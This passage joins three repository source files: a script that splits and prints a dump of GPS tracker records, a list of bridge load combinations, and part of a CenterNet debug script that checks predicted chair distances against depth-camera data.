3cfe9f806a69dac658f48ef9028306aaaa9e5724 | 67954b4bfce1395d571bf4f298f71f04167156c1 | /manoeuvre/test.py | b13e08e0e60992264b88f9768c38a900d28ede85 | [] | no_license | seym45/erc2018 | 90cf4257a541c701940f9985f3fd1e2df326b988 | 0ab9cc3132597d626c2cea999ca65e19510c054e | refs/heads/master | 2020-03-26T22:06:55.342243 | 2018-09-08T19:17:53 | 2018-09-08T19:17:53 | 145,432,610 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,524 | py | a = 'imei:864893030415379,tracker,180819162419,,F,102419.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162429,,F,102429.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162439,,F,102439.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162449,,F,102449.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162359,,F,102359.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819162459,,F,102459.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162409,,F,1\
02409.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162509,,F,102509.00,A,2348.89374,N,09024\
.74758,E,,,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819162519,,F,102519.00,A,2348.89374,N,09024.74758,E,,,,0\
,0,0.00%,,;imei:864893030415379,tracker,180819162529,,L,,,36,,a7c7,,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162539,,F,\
102539.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,help me,180819162541,,F,102541.00,A,2348.89374,N,0902\
4.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162549,,F,102549.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei\
:864893030415379,tracker,180819162559,,F,102559.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,1808\
19162609,,F,102609.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819162719,,F,102719.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,help me,\
180819162723,,F,102723.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162729,,F,102729.00,A,2\
348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162739,,F,102739.00,A,2348.89374,N,09024.74758,E,,,,\
0,0,0.00%,,;imei:864893030415379,tracker,180819162749,,F,102749.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819162759,,F,102759.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162809,,L,,\
,36,,a7c7,,,,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819162819,,F,102819.00,A,2348.89374,N,09024.74758,E,,,\
,0,0,0.00%,,;imei:864893030415379,tracker,180819162829,,F,102829.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:86489303041\
5379,tracker,180819162839,,F,102839.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162849,,F,\
102849.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162859,,F,102859.00,A,2348.89374,N,0902\
4.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162909,,F,102909.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;8648\
93030415379;imei:864893030415379,tracker,180819162919,,F,102919.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163019,,F,103019.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,help me,\
180819163023,,F,103023.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163029,,F,103029.00,A,2\
348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163039,,F,103039.00,A,2348.89374,N,09024.74758,E,,,,\
0,0,0.00%,,;imei:864893030415379,tracker,180819163049,,F,103049.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819163059,,F,103059.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163109,,F,1\
03109.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819163119,,L,,,36,,a7c7,,,,\
,0,0,0.00%,,;imei:864893030415379,tracker,180819163129,,F,103129.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:86489303041\
5379,tracker,180819163139,,F,103139.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,sensor alarm,18081916314\
1,,L,,,36,,a7c7,,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163146,,F,103146.00,A,2348.89190,N,09024.76118,E,0.392,0,,0,0,0.00%,,;imei:864893030415379,tr\
acker,180819163156,,F,103156.00,A,2348.89382,N,09024.76007,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163206,,F,1\
03206.00,A,2348.89382,N,09024.76007,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163216,,F,103216.00,A,2348.89382,N\
,09024.76007,E,0.000,0,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819163226,,F,103226.00,A,2348.89382,N,09024.\
76007,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163237,,F,103236.00,A,2348.89382,N,09024.76007,E,0.000,0,,0,0,0.\
00%,,;imei:864893030415379,tracker,180819163247,,F,103247.00,A,2348.89382,N,09024.76007,E,0.000,0,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819163257,,F,103257.00,A,2348.89382,N,09024.76007,E,0.000,0,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819163307,,F,103307.00,A,2348.89382,N,09024.76007,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tr\
acker,180819163317,,L,,,36,,a7c8,,,,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819163327,,F,103327.00,A,2348.9\
0570,N,09024.75611,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163337,,F,103337.00,A,2348.90570,N,09024.75611,E,0.\
000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163347,,F,103347.00,A,2348.90570,N,09024.75611,E,0.000,0,,0,0,0.00%,,;imei\
:864893030415379,tracker,180819163357,,F,103357.00,A,2348.90570,N,09024.75611,E,0.000,0,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819163407,,F,103407.00,A,2348.90570,N,09024.75611,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163527,,F,103527.00,A,2348.88676,N,09024.76308,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tr\
acker,180819163537,,F,103537.00,A,2348.88676,N,09024.76308,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163547,,F,1\
03547.00,A,2348.88676,N,09024.76308,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163557,,F,103557.00,A,2348.88676,N\
,09024.76308,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163607,,F,103607.00,A,2348.88676,N,09024.76308,E,0.000,0,\
,0,0,0.00%,,;imei:864893030415379,tracker,180819163617,,F,103617.00,A,2348.88676,N,09024.76308,E,0.000,0,,0,0,0.00%,,;8648930304\
15379;imei:864893030415379,tracker,180819163627,,F,103627.00,A,2348.88676,N,09024.76308,E,0.000,0,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819163637,,F,103637.00,A,2348.88676,N,09024.76308,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,18081916364\
7,,F,103647.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163657,,F,103657.00,A,2348.88676,N\
,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163707,,F,103707.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,\
;imei:864893030415379,tracker,180819163717,,F,103717.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;864893030415379;imei:86489303\
0415379,tracker,180819163727,,F,103727.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163737,\
,F,103737.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163747,,F,103747.00,A,2348.88676,N,0\
9024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163757,,F,103757.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;i\
mei:864893030415379,tracker,180819263807,,F,103807.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,1\
80819163817,,F,103817.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819163827,,F,103827.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,\
180819163837,,F,103837.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163847,,F,103847.00,A,2\
348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163857,,F,103857.00,A,2348.88676,N,09024.76308,E,,,,\
0,0,0.00%,,;imei:864893030415379,tracker,180819163907,,F,103907.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819163917,,L,,,36,,a7c8,,,,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819163927,,F,103927.00,A,\
2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163937,,F,103937.00,A,2348.88676,N,09024.76308,E,,,\
,0,0,0.00%,,;imei:864893030415379,tracker,180819163947,,F,103947.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:86489303041\
5379,tracker,180819163957,,F,103957.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819164007,,F,\
104007.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164127,,F,104127.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,\
180819164137,,F,104137.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819164147,,F,104147.00,A,2\
348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819164157,,F,104157.00,A,2348.88676,N,09024.76308,E,,,,\
0,0,0.00%,,;imei:864893030415379,tracker,180819164207,,F,104207.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819164217,,F,104217.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,1\
80819164227,,F,104227.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819164237,,F,104237.00,A,23\
48.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819164247,,F,104247.00,A,2348.88676,N,09024.76308,E,,,,0\
,0,0.00%,,;imei:864893030415379,tracker,180819164257,,F,104257.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164307,,F,104307.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164317,,F,104317.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;864893030415379;imei:86489303\
0415379,tracker,180819164327,,F,104327.00,A,2348.89149,N,09024.75008,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,1808191\
64337,,F,104337.00,A,2348.88951,N,09024.74852,E,5.064,199.45,,0,0,0.00%,,;imei:864893030415379,tracker,180819164336,,F,104336.00\
,A,2348.89119,N,09024.74960,E,4.673,198.15,,0,0,0.00%,,;imei:864893030415379,tracker,180819164347,,L,,,36,,a7c8,,,,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164357,,F,104357.00,A,2348.88053,N,09024.75140,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tr\
acker,180819164407,,F,104407.00,A,2348.88053,N,09024.75140,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164417,,F,1\
04417.00,A,2348.88053,N,09024.75140,E,0.000,0,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164427,,L,,,36,,a7c8,,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819164437,,F,104437.00,A\
,2348.89528,N,09024.75105,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164447,,F,104447.00,A,2348.89528,N,09024.751\
05,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164457,,F,104457.00,A,2348.90971,N,09024.75253,E,0.000,0,,0,0,0.00%\
,,;imei:864893030415379,tracker,180819164507,,F,104507.00,A,2348.90971,N,09024.75253,E,0.000,0,,0,0,0.00%,,;imei:864893030415379\
,tracker,180819164517,,F,104517.00,A,2348.90971,N,09024.75253,E,0.000,0,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracke\
r,180819164527,,F,104527.00,A,2348.90971,N,09024.75253,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164537,,F,10453\
7.00,A,2348.91431,N,09024.76629,E,5.190,41.55,,0,0,0.00%,,;imei:864893030415379,tracker,180819164536,,F,104536.00,A,2348.91198,N\
,09024.76207,E,3.211,42.79,,0,0,0.00%,,;imei:864893030415379,tracker,180819164547,,L,,,36,,a7c8,,,,,0,0,0.00%,,;imei:86489303041\
5379,tracker,180819164557,,F,104557.00,A,2348.90580,N,09024.76485,E,0.000,0,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164607,,L,,,36,,a7c8,,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819164617,,F,104617.00,A\
,2348.89249,N,09024.76605,E,0.000,0,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819164627,,F,104627.00,A,2348.8\
9249,N,09024.76605,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164637,,F,104637.00,A,2348.89249,N,09024.76605,E,0.\
000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164647,,F,104647.00,A,2348.89249,N,09024.76605,E,0.000,0,,0,0,0.00%,,;imei\
:864893030415379,tracker,180819164657,,F,104657.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracke\
r,180819164707,,F,104707.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,help me,180819164707,,F,10470\
7.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164717,,F,104717.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164727,,F,104727.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tr\
acker,180819164737,,F,104737.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164747,,F,1\
04747.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164757,,F,104757.00,A,2348.89632,N\
,09024.76918,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164807,,F,104807.00,A,2348.89632,N,09024.76918,E,0.000,0,\
,0,0,0.00%,,;imei:864893030415379,tracker,180819164817,,F,104817.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;8648930304\
15379;imei:864893030415379,tracker,180819164827,,F,104827.00,A,2348.89831,N,09024.74917,E,0.000,0,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819164837,,F,104837.00,A,2348.89831,N,09024.74917,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,sensor alarm,180819\
164842,,F,104842.00,A,2348.89831,N,09024.74917,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164847,,F,104847.00,A,2\
348.89831,N,09024.74917,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164857,,F,104857.00,A,2348.89831,N,09024.74917\
,E,0.000,0,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164907,,F,104907.00,A,2348.89831,N,09024.74917,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tr\
acker,180819164917,,F,104917.00,A,2348.88471,N,09024.75093,E,0.000,0,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,1\
80819164927,,F,104927.00,A,2348.89027,N,09024.75543,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164937,,F,104937.0\
0,A,2348.89027,N,09024.75543,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164947,,F,104947.00,A,2348.89027,N,09024.\
75543,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164957,,F,104957.00,A,2348.89027,N,09024.75543,E,0.000,0,,0,0,0.\
00%,,;\
'
# The literal above is one long dump of GPS tracker records; individual
# records are separated by ';'.  Split and print one record per line.
a= a.split(';')
for line in a:
    print(line)
"seym45@gmail.com"
] | seym45@gmail.com |
48cf3ed92a3e10d96e85fb1b15ba0340b11f90da | 9dba8607dce414f9905700d7a4ac44668de5e1f1 | /puente_quintanavides/combinaciones/def_hip_elscp_resumidas_xci.py | da24fbbb055eb1ffb3374131c83a39767b1d825f | [] | no_license | anaiortega/XCmodels | c0463ffe38531578aee281456e88528882255cd7 | e9b8c2f996a21b8aa3314242f3cc12b0e391b5df | refs/heads/master | 2023-08-16T22:44:01.168775 | 2023-08-14T18:15:10 | 2023-08-14T18:15:10 | 141,140,177 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,362 | py | \combinacion["ELSCP001"]{ descomp("1.00*G1 + 0.70*TC1V1")}
\combinacion["ELSCP002"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.20*NV")}
\combinacion["ELSCP009"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC3V2")}
\combinacion["ELSCP010"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC3V2 + 0.20*NV")}
\combinacion["ELSCP021"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC2V2")}
\combinacion["ELSCP022"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC2V2 + 0.20*NV")}
\combinacion["ELSCP041"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC1V2")}
\combinacion["ELSCP042"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC1V2 + 0.20*NV")}
\combinacion["ELSCP053"]{ descomp("1.00*G1 + 0.70*TC1V2")}
\combinacion["ELSCP054"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.20*NV")}
\combinacion["ELSCP061"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.70*TC3V1")}
\combinacion["ELSCP062"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.70*TC3V1 + 0.20*NV")}
\combinacion["ELSCP073"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.70*TC2V1")}
\combinacion["ELSCP074"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.70*TC2V1 + 0.20*NV")}
\combinacion["ELSCP093"]{ descomp("1.00*G1 + 0.70*TC2V1")}
\combinacion["ELSCP094"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.20*NV")}
\combinacion["ELSCP109"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.70*TC3V2")}
\combinacion["ELSCP110"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.70*TC3V2 + 0.20*NV")}
\combinacion["ELSCP129"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.70*TC2V2")}
\combinacion["ELSCP130"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.70*TC2V2 + 0.20*NV")}
\combinacion["ELSCP173"]{ descomp("1.00*G1 + 0.70*TC2V2")}
\combinacion["ELSCP174"]{ descomp("1.00*G1 + 0.70*TC2V2 + 0.20*NV")}
\combinacion["ELSCP189"]{ descomp("1.00*G1 + 0.70*TC2V2 + 0.70*TC3V1")}
\combinacion["ELSCP190"]{ descomp("1.00*G1 + 0.70*TC2V2 + 0.70*TC3V1 + 0.20*NV")}
\combinacion["ELSCP209"]{ descomp("1.00*G1 + 0.70*TC3V1")}
\combinacion["ELSCP210"]{ descomp("1.00*G1 + 0.70*TC3V1 + 0.20*NV")}
\combinacion["ELSCP217"]{ descomp("1.00*G1 + 0.70*TC3V1 + 0.70*TC3V2")}
\combinacion["ELSCP218"]{ descomp("1.00*G1 + 0.70*TC3V1 + 0.70*TC3V2 + 0.20*NV")}
\combinacion["ELSCP229"]{ descomp("1.00*G1 + 0.70*TC3V2")}
\combinacion["ELSCP230"]{ descomp("1.00*G1 + 0.70*TC3V2 + 0.20*NV")}
\combinacion["ELSCP453"]{ descomp("1.00*G1 + 0.60*NV")}
\combinacion["ELSCP454"]{ descomp("1.00*G1 + 0.70*TC3V2 + 0.60*NV")}
\combinacion["ELSCP456"]{ descomp("1.00*G1 + 0.70*TC3V1 + 0.60*NV")}
\combinacion["ELSCP458"]{ descomp("1.00*G1 + 0.70*TC3V1 + 0.70*TC3V2 + 0.60*NV")}
\combinacion["ELSCP461"]{ descomp("1.00*G1 + 0.70*TC2V2 + 0.60*NV")}
\combinacion["ELSCP465"]{ descomp("1.00*G1 + 0.70*TC2V2 + 0.70*TC3V1 + 0.60*NV")}
\combinacion["ELSCP470"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.60*NV")}
\combinacion["ELSCP474"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.70*TC3V2 + 0.60*NV")}
\combinacion["ELSCP479"]{ descomp("1.00*G1 + 0.70*TC2V1 + 0.70*TC2V2 + 0.60*NV")}
\combinacion["ELSCP490"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.60*NV")}
\combinacion["ELSCP492"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.70*TC3V1 + 0.60*NV")}
\combinacion["ELSCP495"]{ descomp("1.00*G1 + 0.70*TC1V2 + 0.70*TC2V1 + 0.60*NV")}
\combinacion["ELSCP500"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.60*NV")}
\combinacion["ELSCP502"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC3V2 + 0.60*NV")}
\combinacion["ELSCP505"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC2V2 + 0.60*NV")}
\combinacion["ELSCP510"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC1V2 + 0.60*NV")}
| [
"l.pereztato@gmail.com"
] | l.pereztato@gmail.com |
11814138337f2db2d0f27136c20633ef680bac49 | 07d1e4d5f55e00bae1376d6adf56070b8458aa52 | /src/debug.py | 2c69a113197ac8050dd0b220d9cebc258b0069cd | [
"MIT",
"BSD-3-Clause"
] | permissive | GRobled0/CenterNet | 0bc85ee7ad11f69eb9477ce0fec11397c3f333a1 | 740ecf06a96897b3545249bbb239264394283565 | refs/heads/master | 2023-02-11T15:02:10.692191 | 2021-01-05T20:16:22 | 2021-01-05T20:16:22 | 294,961,676 | 0 | 0 | MIT | 2020-09-12T14:38:15 | 2020-09-12T14:38:14 | null | UTF-8 | Python | false | false | 5,979 | py | import _init_paths
import os
import cv2
import csv
import pandas as pd
import numpy as np
import kalman
from opts import opts
from detectors.detector_factory import detector_factory
import datasetmaker as dm
from camera_params import cal_params as params_1
from camera_params_realsense import cal_params as params_2
# Image file extensions recognised by the dataset loaders.
image_ext = ['jpg', 'jpeg', 'png', 'webp', 'ppm', 'pgm']
threshold = 0.5  # minimum detection score for a detection to count as a chair
def dibujar_info(img, chair, info, color, color_txt):
    """Draw a detection box with a '<info> m' label above it; return the frame.

    Note: the first rectangle is drawn in place on the caller's array, while
    the label background and text are drawn on copies (matching the original
    call pattern exactly).
    """
    left, top, right, bottom = chair[0], chair[1], chair[2], chair[3]
    img = cv2.rectangle(img, (left, top), (right, bottom), color, 2)
    txt = info + " m"
    font = cv2.FONT_HERSHEY_SIMPLEX
    txt_w, txt_h = cv2.getTextSize(txt, font, 0.5, 2)[0]
    # Filled background strip sized to the label, sitting just above the box.
    img = cv2.rectangle(img.copy(),
                        (left, int(top - txt_h - 2)),
                        (int(left + txt_w), int(top - 2)),
                        color, -1)
    img = cv2.putText(img.copy(), txt, (left, int(top - 2)),
                      font, 0.5, color_txt, thickness=1, lineType=cv2.LINE_AA)
    return img
def dibujar_texto(texto, img, color):
    """Blend *texto* onto the top-left corner of *img* at 50% opacity."""
    labelled = cv2.putText(img.copy(), texto,
                           (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1.0, color, 2)
    # Average the labelled frame with the untouched frame -> translucent text.
    return cv2.addWeighted(labelled, 0.5, img.copy(), 0.5, 0, img.copy())
def eval_total(ret, im, imd, i, opt, path, k_filter):
    """Compare predicted chair distances against depth-derived targets for one frame.

    ret      -- detector output; ret['results'][57] holds the detections for
                class id 57 (presumably the 'chair' category -- confirm).
    im, imd  -- paths to the RGB frame and its aligned depth frame.
    i        -- frame index, used only to name the saved debug image.
    opt      -- run options (dataset_name, kalman_filter, debug, ...).
    path     -- directory where side-by-side debug images are written.
    k_filter -- Kalman filter used to smooth predicted distances.

    Returns five parallel lists, one entry per accepted detection:
    (predictions, target medians, crop means, crop Q1, crop Q3).
    """
    img = cv2.imread(im,-1)
    #img = dm.calibrate_images(img, True)
    img_deb = img.copy()                  # RGB frame used for debug drawing
    imgd = cv2.imread(imd,-1)
    img_real = imgd.copy()                # raw depth values used for statistics
    img_depth = (imgd.copy()/256).astype(np.uint8)
    #img_cal = dm.calibrate_images((imgd.copy()/256).astype(np.uint8), False, opt)
    #img_real = dm.distabs_img(img_real, opt)
    #img_real = dm.change_values(img_real)
    #img_real = dm.calibrate_images(img_real.copy(), False, opt)
    #img_real = img_real/3276.7
    # False-colour rendering of the depth map for the debug montage.
    img_deb_d = cv2.applyColorMap(cv2.convertScaleAbs(imgd.copy(), alpha=0.03), cv2.COLORMAP_JET)
    if opt.dataset_name == 'realsense':
        img_deb_d = cv2.applyColorMap(cv2.convertScaleAbs(imgd.copy(), alpha=0.03), cv2.COLORMAP_JET)
    t = []        # target distances (median of each depth crop)
    p = []        # predicted distances
    m = []        # mean of each depth crop
    q = []        # first quartile of each depth crop
    qq = []       # third quartile of each depth crop
    frame = []
    j = 0
    if opt.kalman_filter:
        # Feed all confident detections of this frame to the filter first so
        # the predict() calls below can be matched against them.
        for chair in ret['results'][57]:
            if chair[4] > threshold:
                frame.append(chair)
        k_filter.frame_update(frame)
    for chair in ret['results'][57]:
        if chair[4] > threshold:          # chair[4] is the detection score
            j = j + 1
            vector = chair[0:4].copy()    # bounding box [x1, y1, x2, y2]
            if opt.dataset_name == 'realsense':
                # NOTE(review): 25 px horizontal shift -- presumably compensates
                # the RGB/depth sensor offset of the RealSense rig; confirm.
                vector[0] = vector[0] - 25
                vector[2] = vector[2] - 25
            checked = dm.check(vector, img.shape)
            crop_img = img_real[int(checked[1]):int(checked[3]), int(checked[0]):int(checked[2])]
            dist = np.percentile(crop_img[crop_img > 0.05], 50) # skip null (zero) depth values
            dist = dm.distabs(dist, opt)
            q1 = np.percentile(crop_img[crop_img > 0.05], 25)
            q1 = dm.distabs(q1, opt)
            q3 = np.percentile(crop_img[crop_img > 0.05], 75)
            q3 = dm.distabs(q3, opt)
            mean = np.mean(crop_img[crop_img > 0.05])
            mean = dm.distabs(mean, opt)
            if opt.kalman_filter:
                p_dist = k_filter.predict(chair)
            else:
                p_dist = chair[5]         # detector's raw distance output -- confirm
            if opt.debug > 0:
                # Prediction drawn on the RGB frame, target on the depth map.
                img_deb = dibujar_info(img_deb.copy(), chair, "{:.2f}".format(p_dist), (255,0,0), (255,255,255))
                img_deb_d = dibujar_info(img_deb_d.copy(), checked, "{:.2f}".format(dist), (255,255,255), (0,0,0))
            t.append(dist)
            p.append(p_dist)
            m.append(mean)
            q.append(q1)
            qq.append(q3)
    if opt.debug > 0:
        img_deb = dibujar_texto("Prediction", img_deb.copy(), (0,0,0))
        img_deb_d = dibujar_texto("Target", img_deb_d.copy(), (255,255,255))
        img_debugger = cv2.hconcat([img_deb, img_deb_d])
        cv2.imwrite(os.path.join(path, str(i) + '.jpg'), img_debugger)
    return p, t, m, q, qq
def debug(opt):
    """Run the detector over the test split, collect per-detection distance
    statistics via eval_total(), save side-by-side debug images, and export
    everything to <dataset>/debug_data.xlsx.
    """
    os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpus_str
    Detector = detector_factory[opt.task]
    detector = Detector(opt)
    if opt.dataset_name == "external":
        path_dataset = "/media/guillermo/60F9-DB6E/external"  # fixed external-drive path
    else:
        path_dataset = os.path.join(os.path.dirname(os.getcwd()), 'data')
        path_dataset = os.path.join(path_dataset, opt.dataset_name)
    path_test = os.path.join(path_dataset, 'images_test')
    path_save = os.path.join(path_dataset, 'debug_images')
    if not os.path.exists(path_save):
        os.makedirs(path_save)
